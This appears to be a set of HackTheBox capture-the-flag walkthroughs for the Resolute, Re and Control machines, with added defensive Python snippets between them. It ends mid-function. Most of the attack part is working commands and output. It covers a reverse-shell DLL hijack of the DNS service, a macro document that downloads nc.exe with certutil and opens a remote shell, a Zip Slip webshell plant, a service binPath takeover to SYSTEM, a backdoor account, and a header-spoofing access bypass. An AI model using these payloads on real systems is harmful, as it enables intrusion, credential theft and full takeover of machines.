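MIN_LENGTH = 14  # threshold chosen for this example; set it to your own baseline


def parse_enum(text):
    """Split enum4linux output into user records and a policy dict."""
    users, policy = [], {}
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            rid, acb, account, name, desc = m.groups()
            users.append({"account": account, "rid": int(rid, 16),
                          "acb": int(acb, 16), "name": name, "desc": desc})
            continue
        m = POLICY_RE.match(line)
        if m:
            policy[m.group(1).strip().lower()] = m.group(2).strip()
    return users, policy


def audit(text):
    """Return (severity, subject, message) findings for the weaknesses above."""
    users, policy = parse_enum(text)
    findings = []
    for u in users:
        m = SECRET_RE.search(u["desc"])
        if m:
            findings.append(("HIGH", u["account"], "description field leaks a credential: " + m.group(1)))
        if u["acb"] & ACB_DISABLED:
            continue  # disabled accounts: the flags below do not matter
        if u["acb"] & ACB_PWNOTREQ:
            findings.append(("HIGH", u["account"], "password not required"))
        if u["acb"] & ACB_PWNOEXP:
            findings.append(("MEDIUM", u["account"], "password never expires"))
    flags = policy.get("password complexity flags")
    if flags is not None and flags.strip("0") == "":
        findings.append(("MEDIUM", "domain", "password complexity disabled"))
    length = policy.get("minimum password length", "")
    if length.isdigit() and int(length) < MIN_LENGTH:
        findings.append(("MEDIUM", "domain", f"minimum password length {length} is below {MIN_LENGTH}"))
    if policy.get("account lockout threshold", "").lower() == "none":
        findings.append(("HIGH", "domain", "no account lockout threshold: one password can be tried against every account"))
    return findings


if __name__ == "__main__":
    for sev, subject, msg in audit(SAMPLE_ENUM):
        print(f"{sev:6} {subject:14} {msg}")
```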

GETTING USER

Let us go after the SMB service with the rpcclient tool. Before that, let us gather some more information about the user marko, whose password we have in cleartext from the enum4linux scan.

I tried Evil-WinRM with marko's credentials, but it didn't work, so I guessed that marko either has no remote access or his account is locked out. I then tried the same password against the rest of the users, and Welcome123! worked for melanie:

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p Welcome123!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> cd ..
*Evil-WinRM* PS C:\Users\melanie> cd Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> dir


Directory: C:\Users\melanie\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:33 AM 32 user.txt


*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
0c3[redacted]540
*Evil-WinRM* PS C:\Users\melanie\Desktop>

Look for hidden directories:

*Evil-WinRM* PS C:\> dir -force

I noticed the directory "PSTranscripts" and went to see what is inside. It has a subfolder "20191203" containing a text file called "PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt", which is a PowerShell transcript. I used type to read it; here is the full transcript:

*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
*Evil-WinRM* PS C:\PSTranscripts\20191203>

I found a lot of useful information, including the user Ryan (probably a system administrator), a link to the backups share, system file locations, etc.
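The transcript above is exactly what a defender should be scanning PowerShell transcription logs for: a `net use` with the password typed on the command line. As an added example (not code from the writeup), this parser walks a transcript in that format, reports each command that carries a positional password and masks it; the sample transcript is constructed in the same shape as the PSTranscripts file, with a placeholder password.

```python
import re
from typing import Dict, List

# Constructed sample in the shape of the C:\PSTranscripts file above (not the
# original file; the password is a placeholder, not the one from the box).
SAMPLE_TRANSCRIPT = r'''**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Placeh0lderPass!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
**********************
Command start time: 20191203063602
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="net use Y: \\fs01\public /user:MEGABANK\ryan"
>> CommandInvocation(Out-String): "Out-String"
'''

HEADER_RE = re.compile(r'^(Username|Start time|Machine): (.+)$', re.M)
# one block per "Command start time" marker, up to the next marker or end of file
BLOCK_RE = re.compile(r'Command start time: (?P<ts>\d+)\n\*+\n(?P<body>.*?)(?=\n\*+\nCommand start time:|\Z)', re.S)
# the logged command text; it may span several lines, so stop at the quote that precedes the next ">>" or "**" line
COMMAND_RE = re.compile(r'name="Command"; value="(?P<cmd>.*?)"\n(?=>>|\*\*)', re.S)
NET_USE_RE = re.compile(r'\bnet(?:\.exe)?\s+use\b', re.I)


def redact_net_use_password(line: str) -> str:
    """Mask positional secrets on a `net use` line; lines without one come back unchanged.

    Syntax is `net use <drive> <UNC path> [password | *] [/user:...]`, so any positional
    token after the share is a secret. The box's command also put the username
    positionally, which is why both trailing tokens get masked.
    """
    m = NET_USE_RE.search(line)
    if not m:
        return line
    head, tokens = line[:m.end()], line[m.end():].split()
    positional = [i for i, t in enumerate(tokens) if not t.startswith("/") and t != "*"]
    secrets = positional[2:]
    if not secrets:
        return line
    for i in secrets:
        tokens[i] = "<redacted>"
    return head + " " + " ".join(tokens)


def find_inline_credentials(transcript: str) -> List[Dict[str, str]]:
    """One finding per logged command that carried a password on its command line."""
    headers = dict(HEADER_RE.findall(transcript))
    user = headers.get("Username", "?")
    findings = []
    for block in BLOCK_RE.finditer(transcript):
        for cmd in COMMAND_RE.finditer(block.group("body")):
            for line in cmd.group("cmd").splitlines():
                redacted = redact_net_use_password(line)
                if redacted != line:
                    findings.append({"user": user, "start": block.group("ts"), "command": redacted})
    return findings


if __name__ == "__main__":
    for f in find_inline_credentials(SAMPLE_TRANSCRIPT):
        print(f"{f['start']} {f['user']}: {f['command']}")
```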

Next, use Evil-WinRM again to log in as Ryan.

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ryan\Documents> dir -force


Directory: C:\Users\ryan\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hsl 9/27/2019 7:05 AM My Music
d--hsl 9/27/2019 7:05 AM My Pictures
d--hsl 9/27/2019 7:05 AM My Videos


*Evil-WinRM* PS C:\Users\ryan\Documents>
The user ryan is found to be a member of DnsAdmins. Membership of the DnsAdmins group allows us to use dnscmd.exe to specify a plugin DLL that should be loaded by the DNS service.

kali@kali:~/htb/resolute$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=4444 --platform=windows -f dll > plugin.dll
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 5120 bytes

Or we use:

msfvenom -p windows/x64/exec cmd='net user administrator P@s5w0rd123! /domain' -f dll > da.dll

Transferring this to the box would likely trigger Windows Defender, so we can use Impacket's smbserver.py to start an SMB server and host the DLL remotely.

kali@kali:~/htb/resolute$ sudo python3 smbserver.py share ./
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,50628)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:283a502fc11be6ad1ec4fa0aa4cabfba:010100000000000080db3d319d56d601c17a65539582e7de0000000001001000750078006f0050004f0058005300650003001000750078006f0050004f00580053006500020010006200620042005700410073006300430004001000620062004200570041007300630043000700080080db3d319d56d601060004000200000008003000300000000000000000000000004000001d931475038242cfeeee05844da428985f415e4fa4005bcd9cf845e6c9bda5510a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310033000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:SHARE)
[*] Handle: 'ConnectionResetError' object is not subscriptable
[*] Closing down connection (10.10.10.169,50628)
[*] Remaining connections []


*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd resolute /config /serverlevelplugindll \\10.10.14.13\share\plugin.dll
*Evil-WinRM* PS C:\Users\ryan\Documents> sc stop dns
*Evil-WinRM* PS C:\Users\ryan\Documents> sc start dns


kali@kali:~/htb/resolute$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.169] 50629
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname
hostname
Resolute

C:\Windows\system32>whoami
whoami
nt authority\system

Author: Puckiestyle

 

htb-re-nl

As always, first an nmap scan

root@kali:~/htb/re# nmap -p- -sT -oN nmapscan 10.10.10.144
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-20 03:27 EST
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 14.92% done; ETC: 03:30 (0:02:23 remaining)
Nmap scan report for 10.10.10.144
Host is up (0.029s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
445/tcp open  microsoft-ds

I found the shares using

root@kali:~/htb/re# smbmap -H 10.10.10.144 -u guest -p ''
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.144...
[+] IP: 10.10.10.144:445 Name: reblog.htb 
Disk Permissions
---- -----------
IPC$ READ ONLY
malware_dropbox READ ONLY

Next I read reblog.htb, and then uploaded a malicious odt file; later it turned out that it had to be an ods file.

In Metasploit there is an exploit that should work:

exploit/multi/misc/openoffice_document_macro

We rename the resulting file to .zip and edit it by replacing the payload with:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">
Sub OnLoad
Shell(&quot;certutil.exe -urlcache -split -f 'http://10.10.14.7/nc.exe' C:\Windows\System32\spool\drivers\color\nc.exe&quot;)
Shell(&quot;C:\Windows\System32\spool\drivers\color\nc.exe 10.10.14.7 1111 -e cmd.exe&quot;)
End Sub
</script:module>
Then I save the modified file as an ods file instead of zip.

root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 22 02:19:02 2020
.. D 0 Wed Jan 22 02:19:02 2020

8247551 blocks of size 4096. 4294559 blocks available
smb: \> put puckiestyle.odt
putting file puckiestyle.odt as \puckiestyle.odt (28.8 kb/s) (average 28.8 kb/s)
smb: \>
root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.144 - - [22/Jan/2020 04:03:03] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [22/Jan/2020 04:03:04] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 -


root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 22 04:59:00 2020
  ..                                  D        0  Wed Jan 22 04:59:00 2020

		8247551 blocks of size 4096. 4294527 blocks available
smb: \> put facelesscoder.ods
putting file facelesscoder.ods as \facelesscoder.ods (28.0 kb/s) (average 28.0 kb/s)
smb: \> put facelesscoder.ods
putting file facelesscoder.ods as \facelesscoder.ods (28.1 kb/s) (average 28.1 kb/s)
smb: \> 

Here is the odt/ods file I used: https://github.com/puckiestyle/pentest/blob/master/puckiestyle.ods.zip

 root@kali:~# rlwrap nc -nlvp 1111
listening on [any] 1111 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49675
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
whoami
re\luke

C:\Program Files\LibreOffice\program>
c:\Users\luke\Desktop>type user.txt
type user.txt
FE41736F5B9311E48E48B520D9F384D3


Creating a Zip Slip archive

I create a Zip Slip archive by first creating the folders \inetpub\wwwroot\blog on my Kali box.

Then I copied puckieshell.ods there.

Then I made the Zip Slip archive with

root@kali:/HTB/RE# zip temp.zip ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx
  adding: ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx (deflated 75%)

Then upload this zipslip.zip to the ods folder for analysis by the vulnerable WinRAR.
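The defensive counterpart of the archive built above, as an added example that is not code from the writeup: an extractor that detects entries whose path escapes the destination (the same `../../inetpub/...` shape, with placeholder content instead of a shell) and refuses the whole archive. Python's own extractall() already strips such components; the check is written out here so it can be applied to any unpacker, including ones that honour backslashes and drive letters like a Windows tool would.

```python
import io
import os
import tempfile
import zipfile
from typing import List

# Constructed sample: the entry name mirrors the `zip temp.zip ../../../../../../../../inetpub/...`
# command above; the content is a placeholder, not a webshell.
TRAVERSAL_NAME = "../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx"


def build_sample_zip(include_traversal: bool = True) -> bytes:
    """Build an in-memory zip with one benign entry and, optionally, one Zip Slip entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("sample.txt", "benign content for analysis\n")
        if include_traversal:
            # zipfile keeps the "../" components verbatim, exactly as `zip` did in the writeup
            zf.writestr(TRAVERSAL_NAME, "<!-- placeholder, not a shell -->\n")
    return buf.getvalue()


def unsafe_entries(zip_bytes: bytes, dest: str) -> List[str]:
    """Names of entries that a naive extractor would write outside `dest`.

    Absolute names, drive letters, ".." components and backslash separators
    (all honoured by a Windows extractor such as the vulnerable WinRAR) are rejected.
    """
    dest_root = os.path.realpath(dest)
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            normalised = name.replace("\\", "/")
            if normalised.startswith("/") or (len(normalised) > 1 and normalised[1] == ":"):
                bad.append(name)
                continue
            target = os.path.realpath(os.path.join(dest_root, normalised))
            try:
                inside = os.path.commonpath([dest_root, target]) == dest_root
            except ValueError:  # different drives on Windows: certainly outside
                inside = False
            if not inside:
                bad.append(name)
    return bad


def safe_extract(zip_bytes: bytes, dest: str) -> List[str]:
    """Refuse the whole archive if any entry escapes; otherwise extract and return the names."""
    bad = unsafe_entries(zip_bytes, dest)
    if bad:
        raise ValueError(f"refusing to extract, path traversal in entries: {bad}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
        return zf.namelist()


def demo() -> dict:
    """Run both archives against a throwaway directory and report what happened."""
    dest = tempfile.mkdtemp(prefix="ods-analysis-")
    result = {"unsafe": unsafe_entries(build_sample_zip(True), dest)}
    try:
        safe_extract(build_sample_zip(True), dest)
        result["blocked"] = False
    except ValueError:
        result["blocked"] = True
    result["extracted"] = safe_extract(build_sample_zip(False), dest)
    result["sample_exists"] = os.path.isfile(os.path.join(dest, "sample.txt"))
    return result


if __name__ == "__main__":
    print(demo())
```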

c:\Users\luke\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is 4638-2C29

Directory of c:\Users\luke\Documents

06/18/2019 01:05 PM <DIR> .
06/18/2019 01:05 PM <DIR> ..
01/22/2020 03:28 AM <DIR> malware_dropbox
01/22/2020 03:28 AM <DIR> malware_process
01/22/2020 03:46 AM <DIR> ods
06/18/2019 09:30 PM 1,096 ods.yara
06/18/2019 09:33 PM 1,783 process_samples.ps1
03/13/2019 05:47 PM 1,485,312 yara64.exe
3 File(s) 1,488,191 bytes
5 Dir(s) 17,559,576,576 bytes free

c:\Users\luke\Documents>whoami
whoami
re\luke

c:\Users\luke\Documents>certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar"
certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar"
****  Online  ****
  0000  ...
  322f
CertUtil: -URLCache command completed successfully.

root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.144 - - [22/Jan/2020 08:16:30] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [23/Jan/2020 04:00:25] "GET /puckiestyle.zip HTTP/1.1" 200 -

Next I opened the browser and went to the shell.

I first created a folder c:\temp to put my files in. Then I started a netcat session.

root@kali:~/htb/re# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49734
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\blog>whoami
whoami
iis apppool\reblog
c:\Program Files\Sysinternals>accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt
accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt

Accesschk v6.12 - Reports effective permissions for securable objects
Copyright (C) 2006-2017 Mark Russinovich
Sysinternals - www.sysinternals.com

Next I discovered in accesscheck.txt that NT AUTHORITY\SERVICE also had RW access on UsoSvc.

c:\Program Files\Sysinternals>type c:\temp\accesscheck.txt
-snip-
UserManager
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
UsoSvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW NT AUTHORITY\SERVICE
SERVICE_ALL_ACCESS
VaultSvc
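Added example, not from the writeup: a small parser for `accesschk -uvwc *` output that flags services where a principal other than SYSTEM, Administrators or TrustedInstaller holds write or change-config rights, the condition that makes UsoSvc here a privesc path. The sample output is constructed in the shape of accesscheck.txt above and also parses a flattened paste that has lost its indentation.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the layout of `accesschk -uvwc *`, trimmed to the three
# services shown in accesscheck.txt above (illustrative, not the box's full output).
SAMPLE_ACCESSCHK = """\
UserManager
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\\Administrators
        SERVICE_ALL_ACCESS
UsoSvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\\SERVICE
        SERVICE_ALL_ACCESS
VaultSvc
  Medium Mandatory Level (Default) [No-Write-Up]
  R  NT AUTHORITY\\Authenticated Users
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
"""

Ace = Tuple[str, str, List[str]]  # (access flag, principal, rights)

TRUSTED_PRINCIPALS = {
    "nt authority\\system",
    "builtin\\administrators",
    "nt service\\trustedinstaller",
}
# rights that let the holder rewrite binPath or otherwise take over the service
TAKEOVER_RIGHTS = {
    "SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG", "WRITE_DAC",
    "WRITE_OWNER", "GENERIC_WRITE", "GENERIC_ALL",
}

PRINCIPAL_RE = re.compile(r"^(RW|R|W)\s+(.+?)\s*$")
RIGHT_RE = re.compile(r"^((?:SERVICE|GENERIC|WRITE|READ|STANDARD_RIGHTS|ACCESS_SYSTEM)_[A-Z_]+|DELETE|SYNCHRONIZE)$")


def parse_accesschk(text: str) -> Dict[str, List[Ace]]:
    """Group accesschk -v output by service; works on a pasted copy that lost its indentation."""
    services: Dict[str, List[Ace]] = {}
    current: List[Ace] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or "Mandatory Level" in line:
            continue
        m = PRINCIPAL_RE.match(line)
        if m:
            current.append((m.group(1), m.group(2), []))
            continue
        if RIGHT_RE.match(line) and current:
            current[-1][2].append(line)
            continue
        current = services.setdefault(line, [])  # anything else starts a new service block
    return services


def weak_services(text: str) -> Dict[str, List[str]]:
    """Services where a principal outside the trusted set holds a takeover right (W flag or explicit right)."""
    findings: Dict[str, List[str]] = {}
    for service, aces in parse_accesschk(text).items():
        for flag, principal, rights in aces:
            if principal.lower() in TRUSTED_PRINCIPALS:
                continue
            if "W" in flag or TAKEOVER_RIGHTS.intersection(rights):
                findings.setdefault(service, []).append(principal)
    return findings


if __name__ == "__main__":
    for service, who in weak_services(SAMPLE_ACCESSCHK).items():
        print(f"{service}: writable by {', '.join(who)}")
```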

For privesc I used UsoSvc (first check the current binPath, then change it, and finally stop and start the UsoSvc service).

C:\inetpub\wwwroot\blog>sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
[SC] ChangeServiceConfig SUCCESS

C:\inetpub\wwwroot\blog>reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"
reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\usosvc
ImagePath REG_EXPAND_SZ C:\temp\nc.exe 10.10.14.7 53 -e cmd


C:\inetpub\wwwroot\blog>net stop usosvc
net stop usosvc
The Update Orchestrator Service service is not started.

More help is available by typing NET HELPMSG 3521.


C:\inetpub\wwwroot\blog>net start usosvc
net start usosvc
The service is not responding to the control function.

More help is available by typing NET HELPMSG 2186.


C:\inetpub\wwwroot\blog>


root@kali:~/htb/re# rlwrap nc -nlvp 53
listening on [any] 53 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49735
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>net user coby IEstyle
net user coby IEstyle
The command completed successfully.

C:\Windows\system32>net share root=C:\Users\administrator\desktop /grant:everyone,FULL
C:\Windows\system32>net use z: \\127.0.0.1\root /user:coby IEstyle
net use z: \\127.0.0.1\root /user:coby IEstyle
The command completed successfully.

C:\Windows\system32>z:
z:

Z:\>dir
dir
Volume in drive Z has no label.
Volume Serial Number is 4638-2C29

Directory of Z:\

04/14/2019 11:35 AM <DIR> .
04/14/2019 11:35 AM <DIR> ..
03/27/2019 05:37 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 17,572,204,544 bytes free

Z:\>type root.txt
type root.txt
1B4FB905423F4AD8D99C731468F7715D

Z:\>

Instead of netcat, it can also be done with PowerUp:
Invoke-ServiceAbuse -Name "UsoSvc" -Command "\users\public\downloads\nc.exe 10.10.14.7 53 -e cmd"

Author: Puckiestyle


htb-control-nl

As always we start with an nmap scan

# Nmap 7.80 scan initiated Fri Jan 3 10:25:07 2020 as: nmap -sC -sV -oA control-nmap 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.033s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
| fingerprint-strings: 
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|_ Host '10.10.16.70' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 3 10:25:32 2020 -- 1 IP address (1 host up) scanned in 25.52 seconds

There is a website called “Fidelity” hosted on the default TCP port.

There are 4 pages: an index page, an about page, an admin page and a login page. The admin and login pages did not provide any login form, but an error: “Access Denied: Header Missing. Please ensure you go through the proxy to access this page“. This error points towards a misconfiguration, so I proceed to analyze the source code.

The source code of index.php has a commented section with a To-do message:

This revealed an internal IP address: 192.168.4.28. I fire up Burp to see if there are any requests being sent or received.

The request in Burp also showed that it isn’t going to the web server through a proxy, and the same error comes back if I request the admin.php or login.php pages.

So, to access these you either need a proxy that allows you access, or you simulate that you are using the proxy by adding the HTTP header “X-Forwarded-For”. Burp is useful for adding such headers, so I’m going to use my already running Burp. I assumed 192.168.4.28 as the X-Forwarded-For IP (the proxy), because this is the only internal IP I found in the website’s source code, and it actually worked.

As soon as I forwarded the request in Burp, I was able to access the admin panel (or a product page).
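As an added example (not code from the writeup), here is the header-only check the site appears to use next to a hardened version that consults X-Forwarded-For only when the TCP peer really is the proxy, resolving the client from the right-hand end of the header chain. The proxy address is the one from the page's source comment; the admin range 192.168.4.0/24 is an assumption.

```python
import ipaddress
from typing import Mapping, Optional, Union

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

# Constructed values: the proxy is the address hinted in index.php, the admin
# network is an assumption for the example.
TRUSTED_PROXIES = [ipaddress.ip_network("192.168.4.28/32")]
ADMIN_NETWORKS = [ipaddress.ip_network("192.168.4.0/24")]


def _is_in(ip: IPAddr, networks) -> bool:
    return any(ip in net for net in networks)


def gate_as_found(remote_addr: str, headers: Mapping[str, str]) -> bool:
    """The check the site appears to use: the header alone decides, the TCP peer is never consulted."""
    return headers.get("X-Forwarded-For", "").strip() == "192.168.4.28"


def client_ip(remote_addr: str, headers: Mapping[str, str]) -> Optional[IPAddr]:
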